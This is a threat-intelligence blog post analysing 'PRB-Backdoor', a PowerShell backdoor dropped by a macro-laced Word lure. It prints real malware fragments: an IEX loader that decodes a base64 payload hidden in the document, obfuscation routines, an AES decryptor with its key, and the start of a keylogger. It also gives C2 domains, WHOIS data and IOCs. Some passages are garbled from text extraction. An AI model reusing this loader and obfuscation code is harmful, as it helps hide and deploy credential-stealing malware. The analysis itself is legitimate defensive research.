# PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions **sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html** Mo Bustami ## INTRODUCTION [The great people at ClearSky reached out to me a couple of days ago regarding a sample that they suspected could be related to](https://www.clearskysec.com/) MuddyWater. They suspected so because the sample had some similarities with the way MuddyWater lures look like and some similarities in some PowerShell obfuscation, in specific the character substitution routine. MuddyWater Sample New Sample However, after analyzing the sample and investigating it more, I was able to showcase that this is indeed something different but nonetheless interesting. This blog is a walk through my analysis and will highlight initial insights into this potential attack. ## THE SAMPLE - FROM AIRMILES TO MACRO CODE TO POWERSHELL The sample that was shared with me is a macro laced word document called "Egyptairplus.doc" with an MD5 hash of fdb4b4520034be269a65cfaee555c52e. The macro code contains a function called Worker() which calls multiple other functions embedded in the document to ultimately run a PowerShell command: ----- _po e s_ _C byp SS CO_ _a_ _& {$pt_ _\ ocu_ _e t ;$ t_ _;$ t ge_ _cO t_ _t pat_ _$_ _e co_ _G aSC ; O_ _ac ($_ _$_ _){_ _($I.Length -Gt 7700){$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt=$i.sPLIt('**')_ _[2];BREak}};$rt=[syStEm.TExT.eNCODing]::asCII.gEtsTrIng([sysTEm.ConverT]::FROmbaSe64sTriNG($rT));IEX($RT);_ This command looks for a chunk of data that is embedded in the actual document and begins with "**" and then takes that code and Base64 decodes it. The result is a PowerShell script that looks like this _function main_ _{_ _$content="ZnVuY3Rpb24gejB3MnVQZVgoJHNLUHYpewogICAgJHNLUHYgPSAkc0tQdi5Ub0NoYXJBcnJheSgpCiAgICBbYXJyYXldOjpSZXZlcnN_ _..._ _..._ _..._ _... Truncated code..._ _2ZhbHNlIiwgMCkp"_ _[string]$decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content))_ _iex $decode_ _}_ _main_ Replacing iex with Write-Output and running this code will result in a second layer PowerShell script that is shown earlier in the blog and has similarities with MuddyWater code due to the use of the Character Substitution functions. Below is a snippet of the code: _function z0w2uPeX($sKPv){_ _$sKPv = $sKPv.ToCharArray()_ _[array]::Reverse($sKPv)_ _$G8JdH = -join($sKPv)_ _return $G8JdH_ _}_ _function FQdZ7EqW($fpuD){_ _$fpuD = $fpuD.Replace('#a#', "`n").Replace('#b#', '"').Replace('#c#', "'").Replace('#d#', "$").Replace('#e#', "``")_ _return $fpuD_ _}_ _iex(FQdZ7EqW("{4}{5}{6}{1}{2}{0}{3}" -f (z0w2uPeX("1 sd")),"Se","con","0","S","tart-Slee",(z0w2uPeX("- p")), 0))_ _iex(FQdZ7EqW("{2}{1}{5}{0}{4}{3}" -f (z0w2uPeX(" yeWs60")),(z0w2uPeX("ob")),"[","e",(z0w2uPeX("urT#d# =")),"ol]#d#gS", 0))_ Once you replace all the iex with Write-Output you will end up with more readable code as shown below This code still contains encoded chunks of data. Two interesting pieces are Invoker.ps1 and js.hta The Invoker.ps1 script is used to decrypt the main Backdoor code as shown below: _$nxUHOcAE = "0ef4b1acb4394766" #This is the Key used to Decrypt the main Backdoor code_ _$xWCWwEep = "{path}"_ _[string]$BJgVSQMa = Get-Content -Path $xWCWwEep -Force_ _$nl3hMTam = new-object system.security.cryptography.RijndaelManaged_ _$nl3hMTam.Mode = [System.Security.Cryptography.CipherMode]::ECB_ _$nl3hMTam.Padding = [System.Security.Cryptography.PaddingMode]::Zeros_ _$nl3hMTam.BlockSize = 128_ _$nl3hMTam.KeySize = 128_ _$nl3hMTam.Key = [System.Text.Encoding]::UTF8.GetBytes($nxUHOcAE)_ _$W9NYYLlk = [System.Convert]::FromBase64String($BJgVSQMa)_ _$Oj5PebcQ = $nl3hMTam.CreateDecryptor();_ _$mL9fRirD = $Oj5PebcQ.TransformFinalBlock($W9NYYLlk, 0, $W9NYYLlk.Length);_ _[string]$Pru8pJC5 = [System.Text.Encoding]::UTF8.GetString($mL9fRirD).Trim('*')_ _Write-Output $Pru8pJC5 #I replaced iex with Write-Output_ _while($true){_ _start-sleep -seconds 3_ _}_ ----- e t e e c ypted ac doo code s passed t oug t s sc pt t be dec ypted to t e u edged ac doo code a s a g a s ppet of the code here as the full code of the backdoor is over 2000 lines of code when properly formatted. Notice the main function name PRB hence the name I have given it "PRB-Backdoor" ## POTENTIAL COMMAND & CONTROL Running the sample in a sandbox did not show any network communication. However, during the analysis of the code I noticed early on a variable with the value $hash.httpAddress ="http://outl00k[.]net" This looks like the main domain that the backdoor communicates with for all of it's different functions. Doing some Passive DNS and WHOIS lookup we can get additional information on the domain: _Domain Name: outl00k.net_ _Registrar WHOIS Server: whois.joker.com_ _Registrar URL: http://joker.com/_ _Updated Date: 2018-04-25T03:32:22Z_ _Creation Date: 2018-01-01T11:35:58Z_ _Registrant Name: Simon Nitoo_ _Registrant Street: Tehran_ _Registrant City: Tehran_ _Registrant State/Province: Tehran_ _Registrant Postal Code: 231423465_ _Registrant Country: IR_ _Registrant Phone: +98.2189763584_ _Registrant Email: simon.nitoo@chmail.ir_ _Registry Admin ID:_ _Admin Name: Simon Nitoo_ _Admin Street: Tehran_ _Admin City: Tehran_ _Admin State/Province: Tehran_ _Admin Postal Code: 231423465_ _Admin Country: IR_ _Admin Phone: +98.2189763584_ _Admin Email: simon.nitoo@chmail.ir_ _Registry Tech ID:_ _Tech Name: Simon Nitoo_ _Tech Street: Tehran_ _Tech City: Tehran_ _Tech State/Province: Tehran_ _Tech Postal Code: 231423465_ _Tech Country: IR_ _Tech Phone: +98.2189763584_ _Tech Email: simon.nitoo@chmail.ir_ _Name Server: ns1.outl00k.net_ _Name Server: ns2.outl00k.net_ The Registrant email address is also used for another domain LinLedin[.]net Both domains are currently resolving to the following IP addresses _outl00k[.]net - 74.91.19[.]118 up until May 10, 2018_ _LinLedin[.]net - 5.160.124[.]99 on April 30, 2018_ As of the writing of this blog, there doesn't seem to be much information about either of those domains. ## PRB-BACKDOOR FUNCTIONALITY - AN EARLY LOOK I am yet to go through the whole code of the backdoor however below is an initial look into the functionality of it based on initial analysis ----- ac doo as t e o o g u ct o s **PRB-CREATEALIVE and PRB-CREATEINTRODUCE - those two functions seem to be related to initial communication and registration** with the C&C **PRB-HISTORY is a function that looks to grab the browsing history from different browsers including Chrome, IE and FireFox. It utilizes a** sub function called GET-HISTORY **PRB-PASSWORD** **PRB-WRITEFILE** **PRB-READFILE** **PRB-FUNCTUPDATE** **PRB-SHELL** **PRB-LOGGER** **SNAP - takes a screenshot of the screen** **sysinfo - gets the system info** And many more functions. At some point in the code there is even what seems to be .NET/C# code snippets _$dsc = @"_ _using System;_ _using System.IO;_ _using System.Diagnostics;_ _using System.Runtime.InteropServices;_ _using System.Windows.Forms;_ _using System.Text;_ _namespace dDumper_ _{_ _public static class Program_ _{_ _private const int WH_KEYBOARD_LL = 13;_ _private const int WM_KEYDOWN = 0x0100;_ _private const int WM_SYSTEMKEYDOWN = 0x0104;_ _private const int WM_KEYUP = 0x0101;_ _private const int WM_SYSTEMKEYUP = 0x0105;_ ## FINAL THOUGHTS The PRB-Backdoor seems to be a very interesting piece of malware that is aimed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source. I would imagine there would be other lures and samples out there and hopefully other researchers that would be able to dive deeper into the code and reveal additional details. I will do so as soon as I have additional time but I thought it would be beneficial to share these initial findings in hope to shed some light into this activity. ## INDICATORS OF COMPROMISE fdb4b4520034be269a65cfaee555c52e _outl00k[.]net_ _LinLedin[.]net_ _74.91.19[.]118_ _5.160.124[.]99_ ## Clearing the MuddyWater - Analysis of new MuddyWater Samples -----